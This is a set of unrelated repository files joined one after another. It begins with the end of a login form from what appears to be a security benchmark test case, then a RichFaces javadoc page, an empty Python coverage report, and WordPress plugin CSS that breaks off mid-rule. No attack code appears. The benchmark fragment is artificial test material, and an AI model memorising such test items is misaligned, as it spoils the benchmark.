id="BenchmarkTest00807" name="BenchmarkTest00807" value="SafeText"></input></div> <br/> <div><input type="submit" value="Login" /></div> </form> </body> </html>
lib/richfaces/doc/javadoc/org/richfaces/component/AxisAttributes.html
Jacksson/mywmsnb
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_65) on Thu Oct 23 20:37:04 CEST 2014 --> <meta http-equiv="Content-Type" content="text/html" charset="UTF-8"> <title>AxisAttributes (RichFaces Distribution Assembler 4.5.0.Final API)</title> <meta name="date" content="2014-10-23"> <meta name="keywords" content="org.richfaces.component.AxisAttributes interface"> <meta name="keywords" content="getFormat()"> <meta name="keywords" content="getLabel()"> <meta name="keywords" content="getMin()"> <meta name="keywords" content="getMax()"> <meta name="keywords" content="getPad()"> <link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="AxisAttributes (RichFaces Distribution Assembler 4.5.0.Final API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/AxisAttributes.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-all.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage"><em><b>RichFaces Distribution Assembler 4.5.0.Final</b></em></div> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../org/richfaces/component/AutocompleteMode.html" title="enum in org.richfaces.component"><span class="strong">Prev Class</span></a></li> <li><a href="../../../org/richfaces/component/BasicActionComponent.html" title="class in org.richfaces.component"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../index.html?org/richfaces/component/AxisAttributes.html" target="_top">Frames</a></li> <li><a href="AxisAttributes.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">org.richfaces.component</div> <h2 title="Interface AxisAttributes" class="title">Interface AxisAttributes</h2> </div> <div class="contentContainer"> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>All Known Implementing Classes:</dt> <dd><a href="../../../org/richfaces/component/AbstractChartPoint.html" title="class in org.richfaces.component">AbstractChartPoint</a>, <a href="../../../org/richfaces/component/AbstractChartXAxis.html" title="class in org.richfaces.component">AbstractChartXAxis</a>, <a href="../../../org/richfaces/component/AbstractChartYAxis.html" title="class in org.richfaces.component">AbstractChartYAxis</a>, <a href="../../../org/richfaces/ui/output/component/UIPoint.html" title="class in org.richfaces.ui.output.component">UIPoint</a>, <a href="../../../org/richfaces/ui/output/component/UIXAxis.html" title="class in org.richfaces.ui.output.component">UIXAxis</a>, <a href="../../../org/richfaces/ui/output/component/UIYAxis.html" title="class in org.richfaces.ui.output.component">UIYAxis</a></dd> </dl> <hr> <br> <pre>public interface <span class="strong">AxisAttributes</span></pre> <dl><dt><span class="strong">Author:</span></dt> <dd>Lukas Macko</dd></dl> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/component/AxisAttributes.html#getFormat()">getFormat</a></strong>()</code> <div class="block">Format for axis ticks (Date series only)</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/component/AxisAttributes.html#getLabel()">getLabel</a></strong>()</code> <div class="block">Text shown next to axis.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/component/AxisAttributes.html#getMax()">getMax</a></strong>()</code> <div class="block">Maximum value of the axis</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/component/AxisAttributes.html#getMin()">getMin</a></strong>()</code> <div class="block">Minimum value shown on the axis.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Double.html?is-external=true" title="class or interface in java.lang">Double</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/component/AxisAttributes.html#getPad()">getPad</a></strong>()</code> <div class="block">It’s the fraction of margin that the scaling algorithm will add to avoid that the outermost points ends up on the grid border.</div> </td> </tr> </table> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="getFormat()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getFormat</h4> <pre><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;getFormat()</pre> <div class="block">Format for axis ticks (Date series only)</div> </li> </ul> <a name="getLabel()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getLabel</h4> <pre><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;getLabel()</pre> <div class="block">Text shown next to axis.</div> </li> </ul> <a name="getMin()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getMin</h4> <pre><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;getMin()</pre> <div class="block">Minimum value shown on the axis.</div> </li> </ul> <a name="getMax()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getMax</h4> <pre><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;getMax()</pre> <div class="block">Maximum value of the axis</div> </li> </ul> <a name="getPad()"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>getPad</h4> <pre><a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Double.html?is-external=true" title="class or interface in java.lang">Double</a>&nbsp;getPad()</pre> <div class="block">It’s the fraction of margin that the scaling algorithm will add to avoid that the outermost points ends up on the grid border.</div> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/AxisAttributes.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-all.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage"><em><b>RichFaces Distribution Assembler 4.5.0.Final</b></em></div> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../org/richfaces/component/AutocompleteMode.html" title="enum in org.richfaces.component"><span class="strong">Prev Class</span></a></li> <li><a href="../../../org/richfaces/component/BasicActionComponent.html" title="class in org.richfaces.component"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../index.html?org/richfaces/component/AxisAttributes.html" target="_top">Frames</a></li> <li><a href="AxisAttributes.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2014 <a href="http://www.jboss.org">JBoss by Red Hat</a>. All Rights Reserved.</small></p> </body> </html>
htmlcov/_usr_local_lib_python2_7_dist-packages_django_contrib_admin_templatetags___init__.html
AGnarlyNarwhal/cse360_webapp
<!doctype html PUBLIC "-//W3C//DTD html 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <meta http-equiv='X-UA-Compatible' content='IE=emulateIE7' /> <title>Coverage for /usr/local/lib/python2.7/dist-packages/django/contrib/admin/templatetags/__init__: 100%</title> <link rel='stylesheet' href='style.css' type='text/css'> <script type='text/javascript' src='jquery.min.js'></script> <script type='text/javascript' src='jquery.hotkeys.js'></script> <script type='text/javascript' src='jquery.isonscreen.js'></script> <script type='text/javascript' src='coverage_html.js'></script> <script type='text/javascript' charset='utf-8'> jQuery(document).ready(coverage.pyfile_ready); </script> </head> <body id='pyfile'> <div id='header'> <div class='content'> <h1>Coverage for <b>/usr/local/lib/python2.7/dist-packages/django/contrib/admin/templatetags/__init__</b> : <span class='pc_cov'>100%</span> </h1> <img id='keyboard_icon' src='keybd_closed.png'> <h2 class='stats'> 0 statements &nbsp; <span class='run hide_run shortkey_r button_toggle_run'>0 run</span> <span class='mis shortkey_m button_toggle_mis'>0 missing</span> <span class='exc shortkey_x button_toggle_exc'>0 excluded</span> </h2> </div> </div> <div class='help_panel'> <img id='panel_icon' src='keybd_open.png'> <p class='legend'>Hot-keys on this page</p> <div> <p class='keyhelp'> <span class='key'>r</span> <span class='key'>m</span> <span class='key'>x</span> <span class='key'>p</span> &nbsp; toggle line displays </p> <p class='keyhelp'> <span class='key'>j</span> <span class='key'>k</span> &nbsp; next/prev highlighted chunk </p> <p class='keyhelp'> <span class='key'>0</span> &nbsp; (zero) top of page </p> <p class='keyhelp'> <span class='key'>1</span> &nbsp; (one) first highlighted chunk </p> </div> </div> <div id='source'> <table cellspacing='0' cellpadding='0'> <tr> <td class='linenos' valign='top'> </td> <td class='text' valign='top'> </td> </tr> </table> </div> <div id='footer'> <div class='content'> <p> <a class='nav' href='index.html'>&#xab; index</a> &nbsp; &nbsp; <a class='nav' href='http://nedbatchelder.com/code/coverage'>coverage.py v3.7.1</a> </p> </div> </div> </body> </html>
wp-content/plugins/wp-all-import/static/css/admin.css
eyanai/toptik
/*@+ common */ .pmxi_plugin hr { height: 1px; border-width: 0px; color: #ddd; background-color: #ddd; margin-bottom: 15px; } .pmxi_plugin a.button { /*padding: 5px 10px; margin: 1px; font-weight: bold;*/ } .pmxi_plugin a.help { overflow: hidden; text-indent: -99999px; display: inline-block; width: 16px; height: 16px; background-repeat: no-repeat; background-image: url("../img/help.png"); vertical-align: middle; margin-left: 5px; } .pmxi_plugin input.datepicker { width: 8em; } .pmxi_plugin button.ui-datepicker-trigger { background-image: url("../img/date-picker.gif"); background-repeat: no-repeat; cursor: pointer; border: none; margin: 1px; width: 21px; height: 18px; vertical-align: middle; } .pmxi_plugin .progress-msg { font-style: italic; display: none; } .pmxi_plugin .inner-content { max-width: 700px; } .pmxi_plugin .loading { cursor: progress; background-repeat: no-repeat; background-position: center; } .pmxi_plugin .preload { background-image: url("../img/loading.png"); background-repeat: no-repeat; background-position: 50% 200px; } .pmxi_plugin a.add-new { font-size: 18px; background-color: #eee; cursor: pointer; padding: 6px 10px 6px 10px; line-height: normal; font-style: normal; color: #464646; border-color: #bbb; -moz-border-radius: 4px 4px 4px 4px; border-radius: 4px; border-style: solid; border-width: 1px; font-family: "Lucida Grande",Verdana,Arial,"Bitstream Vera Sans",sans-serif; text-decoration: none; } .pmxi_plugin a.add-new:hover { border-color: #666666; color: #000; } .pmxi_plugin div.input { /*line-height: 25px; height: 25px;*/ min-height: 21px; } .pmxi_plugin div.input > * { vertical-align: middle; } .pmxi_plugin .options input[type=text], .pmxi_plugin .options select { /*background: #fafafa !important;*/ border: 1px solid #aaa !important; } .pmxi_plugin .note { color: #666666; font-size: 9px; } .pmxi_plugin div.sub { padding-left: 20px; font-size: 12px; } /* 2 column layout */ .pmxi_plugin table.layout { clear: both; border-collapse: collapse; min-width: 770px; width: 100%; } .pmxi_plugin table.layout td { vertical-align: top; border: none; } .pmxi_plugin table.layout td.left { min-width: 490px; width: 70%; } .pmxi_plugin table.layout td.right { padding: 0px 0 16px 20px; width: 25%; min-width: 260px; position: relative; } .pmxi_plugin table.layout td.left > h2:first-child { margin-top: -22px; padding: 14px 0 3px 0; } .pmxi_plugin table.layout td.left hr { clear: both; } .pmxi_plugin.no-js table.layout td.left > h2:first-child { margin-top: 0px; } .pmxi_plugin table.layout div.left { min-width: 490px; width: 70%; float: left; } .pmxi_plugin table.layout div.right { padding: 0px 0 16px 20px; width: 25%; /*min-width: 260px; */ position: relative; float: right; } /*@*/ /*@+ Setting Form */ .pmxi_plugin form.settings { width: 700px; } /*@*/ /*@+ Choose File forms */ .pmxi_plugin form.choose-file { padding-top: 20px; position: relative; } .pmxi_plugin form.choose-file h3 { margin-bottom: 5px; } .pmxi_plugin form.choose-file .label { font-size: 15px; } .pmxi_plugin form.choose-file input[type="text"], .pmxi_plugin form.choose-file input[type="password"] { width: 80px; font-size: 12px; } .pmxi_plugin form.choose-file input.regular-text, .pmxi_plugin form.choose-file select.regular-text { width: 100%; } .pmxi_plugin #wpcontent form.choose-file select[name="file"], .pmxi_plugin #wpcontent form.choose-file select[name="reimport"] { font-size: 12px; } .pmxi_plugin form.choose-file input[type="submit"].button { /*width: 150px;*/ } .pmxi_plugin form.choose-file div.input { margin-top: 20px; } /*@*/ /*@+ Choose Elements form */ .pmxi_plugin form.choose-elements input[type="text"] { width: 100%; max-width: 300px; min-width: 150px; } /*@*/ /*@+ Template form */ .pmxi_plugin form.template.edit { /*width: 700px;*/ } .pmxi_plugin form.template .load-template { display: block; font-size: 12px; } .pmxi_plugin form.template .load-template select { width: 126px; } .pmxi_plugin #poststuff form.template h3 { margin: 1em 0 5px 2px; font-size: 1.17em; padding: 0px; } .pmxi_plugin #post-preview { font-size: 12px; } .pmxi_plugin #post-preview .error { margin: 5px 0; } .pmxi_plugin h3 .header-option { display: block; float: right; font-size: 12px; font-weight: normal; } /*@*/ /*@+ Options form */ .pmxi_plugin form.options.edit { /*width: 700px;*/ } .pmxi_plugin .post-type-container, .pmxi_plugin .file-type-container { padding: 4px 10px 5px; border: 1px solid transparent; } .pmxi_plugin .post-type-container.selected, .pmxi_plugin .file-type-container.selected { background-color: #F1F1F1; border: 1px solid #ccc; padding-bottom: 10px; } .pmxi_plugin .post-type-container h3, .pmxi_plugin .file-type-container h3 { margin: 0px 0px; } .pmxi_plugin .post-type-container .post-type-options, .pmxi_plugin .file-type-container .file-type-options { margin: 5px 0 0 20px; } .pmxi_plugin table.form-table { clear: none; margin-top: 0px; } .pmxi_plugin .post-type-options table.form-table { max-width: 500px; } .pmxi_plugin .post-type-options table.form-table td.delim { width: 50px; position: relative; display: block; } .pmxi_plugin .post-type-options table.form-table td.delim input { width: 20px; } .pmxi_plugin table.form-table.custom-params { max-width: 700px; } .pmxi_plugin table.form-table td, .pmxi_plugin table.form-table th { padding: 0; vertical-align: top; } .pmxi_plugin .post-type-options table.form-table th { width: 100px; } .pmxi_plugin .post-type-options table.form-table select { max-width: 300px; width:300px; } .pmxi_plugin table.form-table thead td { font-weight: bold; } .pmxi_plugin table.form-table.custom-params input { margin-left: 0; } .pmxi_plugin table.form-table tr.template { display: none; } /*@*/ /*@+ XML representation */ .pmxi_plugin .tag { background-color: #fff; position: absolute; width:95%; top: 0; margin-top: 45px; border-top: 1px solid #DFDFDF; -moz-border-radius-topleft: 4px; -webkit-border-top-left-radius: 4px; border-top-left-radius: 4px; -moz-border-radius-topright: 4px; -webkit-border-top-right-radius: 4px; border-top-right-radius: 4px; } .pmxi_plugin .options .tag{ margin-top: 0px; } .pmxi_plugin .tag .title { font-weight: bold; padding: 6px 8px; color: #464646; background: #DFDFDF; font-size: 12px; } .pmxi_plugin .tag .xml { max-height: 525px; overflow: auto; border: 1px solid #DFDFDF; border-top:none; -moz-border-radius-bottomright: 4px; -webkit-border-bottom-right-radius: 4px; border-bottom-right-radius: 4px; -moz-border-radius-bottomleft: 4px; -webkit-border-bottom-left-radius: 4px; border-bottom-left-radius: 4px; } .pmxi_plugin .tag .navigation { float: right; margin: -2px -12px 0 0; } .pmxi_plugin .tag .navigation a, .pmxi_plugin .tag .navigation span { font-weight: bold; padding: 0 12px; text-decoration: none; } @media screen and (max-height: 700px) { .pmxi_plugin .tag { height:300px; } .pmxi_plugin .tag .xml { max-height: 265px; } } .xml { padding-left: 15px; } .xml-element { border: 1px solid transparent; margin: 1px 1px 1px 0; } .xml-element.selected > .xml-tag.opening .xml-tag-name { background-color: #B5E61D; } .xml-content { padding-left: 14px; } .xml-content.collapsed { display: none; } .xml-content.textonly.short { padding-left: 0px; display: inline; } .xml-tag { display: inline; } .xml-tag-name { color: #906; font-weight: bold; } .xml-tag.opening .xml-tag-name { cursor: pointer; } .xml-attr-name { font-weight: bold; cursor: pointer; } .xml-attr-value { color: blue; } .xml-expander { display: inline-block; width: 12px; margin-left: -12px; -moz-user-select: none; -khtml-user-select: none; -webkit-user-select: none; user-select: none; cursor: pointer; font-family: monospace; line-height: 100%; text-align: left; color: red; } .xml-more { color: red; font-size: 80%; } .xml.resetable .xml-element.lvl-mod4-3 > .xml-content { margin-left: -59px; margin-right: -8px; background-color: #fff; border: 1px dashed #906; border-left: 2px solid #906; border-right: none; } .xml.resetable .xml-element.lvl-mod4-3 > .xml-content.short { margin-left: 0; margin-right: 0; border: none; background-color: inherit; } /* xml table representation */ tr.xml-element.selected .xml-tag.opening .xml-tag-name { background-color: #B5E61D; } table.xml td { padding-left: 20px; } table.xml td:first-child { width: 1px; padding-left: 0px; } table.xml, table.xml table { width: 100%; border-collapse:collapse; border-spacing:0; } /*@*/ /*@+ table list */ .pmxi_plugin table.widefat th { white-space: nowrap; } .pmxi_plugin table.widefat th.ASC a { background-image: url("../img/screen-options-right-up.gif"); background-repeat: no-repeat; background-position: right center; padding-right: 19px; } .pmxi_plugin table.widefat th.DESC a { background-image: url("../img/screen-options-right.gif"); background-repeat: no-repeat; background-position: right center; padding-right: 19px; } .pmxi_plugin table.widefat.pmxi-admin-imports th.column-id { width: 35px; } .pmxi_plugin table.widefat.pmxi-admin-imports th.column-scheduled { width: 85px; } .pmxi_plugin table.widefat.pmxi-admin-imports th.column-registered_on { width: 130px; } .pmxi_plugin table.widefat.pmxi-admin-imports th.column-post_count { width: 105px; } /*@*/ /*@+ fixes */ .pmxi_plugin input[type="file"] { padding: 0; /* FIX height or <input type="file" /> for Safari & Chrome */ } .pmxi_plugin .ui-widget-overlay { position: fixed !important; /* FIX: modal dialog overlay in IE 8 */ background-color: #aaa !important; /* FIX: overlay color */ } .pmxi_plugin .ui-dialog { position: absolute !important; /* FIX: for wordpress 3.1 not to add empty space */ z-index: 999999; } .pmxi_plugin .ui-autocomplete { position: absolute; border-color: #ccc #444 #444 #aaa; cursor: default; -moz-border-radius: 0; border-radius: 0; max-height: 200px; max-width: 700px; overflow-y: auto; overflow-x: hidden; white-space: nowrap; font-size: 11px; } .pmxi_plugin .ui-autocomplete .ui-menu-item { padding: 0; margin: 0; } .pmxi_plugin .ui-autocomplete .ui-menu-item a { display: block; padding: 2px; padding-right: 20px; /* space for scroll bar */ font-size: 11px; border: none; -moz-border-radius: 0; border-radius: 0; } .pmxi_plugin .ui-autocomplete .ui-menu-item a.ui-state-hover { background: #39f; color: #fff; } .pmxi_plugin input.autocomplete { background: url("../img/down.gif") no-repeat right top #fff; padding-right: 20px; cursor: default; font-size: 11px !important; } /*@*/ .pmxi_plugin .taglines{ font-size:13px; font-style: italic; display: block; color: #777; } .pmxi_plugin #process{ display:none; } .pmxi_plugin .load-options{ float:right; font-size:13px; position: relative; top: -30px; } .pmxi_plugin form.options table.layout td.right{ width: 25%; } .pmxi_plugin .drag-element{ background: url("../img/drag.png") top right no-repeat; cursor: pointer; padding-left: 25px; background-position: 0px 1px; } .sortable li{ position: relative;} .pmxi_plugin ol{ margin-top: 6px; list-style: none; } .pmxi_plugin .no-margin{ margin:0px; } .pmxi_plugin .icon-item, .pmxi_plugin .add-new-custom{ display: inline-block; width: 16px; height: 16px; margin: 0px 3px; } .pmxi_plugin .add-new-ico, .pmxi_plugin .add-new-custom{ background: url("../img/ico-add-new.png") no-repeat 0px 4px; width:70px; height:25px; padding-left: 15px; color:#21759B; } .pmxi_plugin .remove-ico{ background: url("../img/ico-remove.png") no-repeat; top:1px; right:0px; position: absolute; } .pmxi_plugin .hidden{ display: none; } .pmxi_plugin .fs11 { font-size:11px; } .pmxi_plugin .rel { position: relative; } #type_meta_select{ margin-bottom: 10px; height:1.8em; } .upload_process{ border: none; padding: 1px; } #large_import_xpath{ display:none; } #large_import{ margin:0px 5px; } #download_pmxi_log{ cursor: pointer; margin: 5px 0; display: none; } .pmxi_plugin .import_process_bar, .pmxi_plugin .import_percent{ display: none; } /*.pmxi_plugin .import_progress{ font-size: 14px !important; }*/ .pmxi_plugin #processbar{ text-align: center; visibility: hidden; height: 37px; padding-top: 18px; margin-bottom: 20px; border: 1px solid #AAAAAA; color: #222222; position: relative; } .pmxi_plugin #processbar div{ background: #aaa; height: 55px; width: 0%; position: absolute; opacity: 0.5; top:0; } .pmxi_plugin #import_progress{ color: #000000; font-size: 13px; font-weight: bold; opacity: 1; } .pmxi_plugin #right_progress{ float:right; padding-right: 5px; } .pmxi_plugin #left_progress{ float:left; padding-left: 5px; } .pmxi_plugin #existing_meta_keys{ margin-bottom: 10px; padding: 2px; width: 580px; } .pmxi_plugin #pmxi_tabs{ /*display: none;*/ padding-bottom: 20px; -moz-border-radius: 4px; -khtml-border-radius: 4px; -webkit-border-radius: 4px; border-radius: 4px; } .pmxi_plugin .pmxi_tab{ display: none; } .pmxi_plugin .ui-widget-header{ -moz-border-radius: 4px; -khtml-border-radius: 4px; -webkit-border-radius: 4px; border-radius: 4px; } .pmxi_plugin .ui-tabs .ui-tabs-nav li{ -moz-border-top-left-radius: 4px; -khtml-border-top-left-radius: 4px; -webkit-border-top-left-radius: 4px; border-top-left-radius: 4px; -moz-border-top-right-radius: 4px; -khtml-border-top-right-radius: 4px; -webkit-border-top-right-radius: 4px; border-top-right-radius: 4px; } /*.pmxi_plugin .ui-widget-header{ background: #F2FBD9; border: 1px solid #F2FBD9; } .pmxi_plugin .ui-state-default{ border:none; font-size: 12px; font-weight: bold; background: #F2FBD9; } .pmxi_plugin .ui-state-active{ background: #fff; } .pmxi_plugin .ui-tabs{ padding: 0px; }*/ #select-files{ font-size: 11px !important; height:25px; } .pmxi_plugin .progress{ position: relative; visibility: hidden; color: #009039; font-size: 13px; font-weight: bold; margin-top: 10px; width: 100%; text-align: center; border:1px solid #4297D7; -moz-border-radius: 4px; -khtml-border-radius: 4px; -webkit-border-radius: 4px; border-radius: 4px; } .pmxi_plugin #progressbar{ border: medium none; left: 0; position: absolute; text-align: center; top: 8px; width: 100%; font-size: 12px; color:#333; } .pmxi_plugin #file_name{ font-size: 16px; font-weight: bold; margin-left: 10px; float: right; } .pmxi_plugin .ui-progressbar .ui-progressbar-value { /*background-image: url("../img/progress_animated.gif");*/ } .pmxi_plugin form.choose-file .submit-buttons{ /*bottom: -125px; position: absolute; right: -18px; */ } .pmxi_plugin form#basic .submit-buttons{ display: none; } .pmxi_plugin fieldset{ padding: 20px; width:auto; } .pmxi_plugin .right fieldset{ padding: 15px; } .pmxi_plugin .right fieldset input{ max-width:none; padding:6px; margin:0px } .pmxi_plugin .right a{ text-decoration: underline; } .pmxi_plugin fieldset legend{ padding: 0px 5px; font-weight: bold; } .pmxi_plugin .options fieldset legend{ font-size: 1.17em; } .pmxi_plugin .matches_count{ font-weight: bold; color:#33AA28; } .pmxi_plugin .xpath_help{ /*bottom: -40px;*/ position: relative; text-align: center; } .pmxi_plugin .btns, .pmxi_plugin .btns input, .pmxi_plugin .btns a{ float: right; } .pmxi_plugin .btns input{ height: 19px; margin-left: 5px; padding-top: 0; } .pmxi_plugin .btns a{ font-weight: bold; margin: 0 5px; padding: 4px 10px; width:70px; text-align: center; } .pmxi_plugin .col3{ /*border-right: 1px solid #CCCCCC;*/ float: left; /*height: 265px;*/ width:33%; margin-bottom: 10px; /*padding: 0 1%;*/ } .pmxi_plugin .col3.last{ border: none; } .pmxi_plugin .col3 > div{ /*margin-left: 20px;*/ } .pmxi_plugin .col2{ float: left; width: 50%; } .pmxi_plugin .col2 fieldset{ border: 1px solid #CCCCCC; margin: 0 5px; padding: 5px 2% 5px 5px; text-align: center; } .pmxi_plugin input.small{ width:25px; text-align: center; } .pmxi_plugin .post_taxonomy{ margin-bottom: 15px; overflow: hidden; padding-bottom: 15px; } .pmxi_plugin .post_taxonomy .delim{ padding-left: 25px; } .pmxi_plugin .post_taxonomy .delim .add-new-ico{ float: right; margin-right: 10%; margin-top: 5px; } .pmxi_plugin .post_taxonomy ol.ui-sortable{ padding-right: 0px; } .pmxi_plugin .optionsset{ border:1px solid #ccc; } .pmxi_plugin .action.remove{ display: block; position: relative; } .pmxi_plugin .action.remove a{ background: url("../img/ico-remove.png") no-repeat scroll 0 0 transparent; height: 16px; position: absolute; right: 20px; width: 16px; } .pmxi_plugin .switcher-target-is_keep_former_posts{ padding-left: 25px; } .pmxi_plugin form.options{ position: relative; } .pmxi_plugin .options_buttons{ bottom: -75px; display: block; position: absolute; right: 0; } .pmxi-button{ border: 1px solid #BBBBBB; color: #464646; cursor: pointer; font-size: 18px !important; margin-left: 10px; padding: 15px 25px; text-decoration: none; -moz-border-radius: 3px; -khtml-border-radius: 3px; -webkit-border-radius: 3px; border-radius: 3px; } .pmxi-button:hover{ background: #dfdfdf; } .pmxi_plugin .ui-state-default a{ font-size: 13px !important; } .pmxi_plugin .preview{ float: none; /*line-height: 32px; position: relative; text-align: center; text-decoration: none; top: -1px; vertical-align: middle;*/ } .pmxi_plugin .template-sidebar .tag{ max-height:550px; } .pmxi_plugin .options .submit-buttons{ float: right; position: relative; text-align: right; top: 10px; } .pmxi_plugin .back{ color: #21759B; font-size: 20px; position: relative; top: 3px; } .pmxi_plugin .separated_by{ float: right; font-size: 12px; color: #999999; margin-right: 20px; } .pmxi_plugin .delim > label{ color: #999999; font-size: 11px; } .pmxi_plugin .optionsset > table{ border-bottom: 1px solid #CCCCCC; margin-bottom: 20px; width: 100%; } /* Log Bar - Step 5 */ .pmxi_plugin #logwrapper{ border: 1px solid #aaa; margin-bottom: 20px; } .pmxi_plugin #logbar{ padding: 5px 0px; text-align: center; margin: 10px 0px; border: 1px solid #aaa; overflow: auto; } .pmxi_plugin .optionsset > table:last-child{ border: none; } .pmxi_plugin #download_log_separator, .pmxi_plugin #download_log{ display: none; } .pmxi_plugin #loglist{ border: 1px solid #AAAAAA; height: 400px; overflow: auto; } .pmxi_plugin #loglist > p{ margin: 0; padding: 3px 5px; } .pmxi_plugin #loglist > p.odd{ background: #dfdfdf; } .pmxi_plugin #process_notice{ color: red; text-align: center; } .pmxi_plugin #reimported_notify{ border: 1px solid #AFAFAF; margin-bottom: 20px; padding: 10px 20px; } .pmxi_plugin #reimported_notify p span{ color:#ccc; } .pmxi_plugin 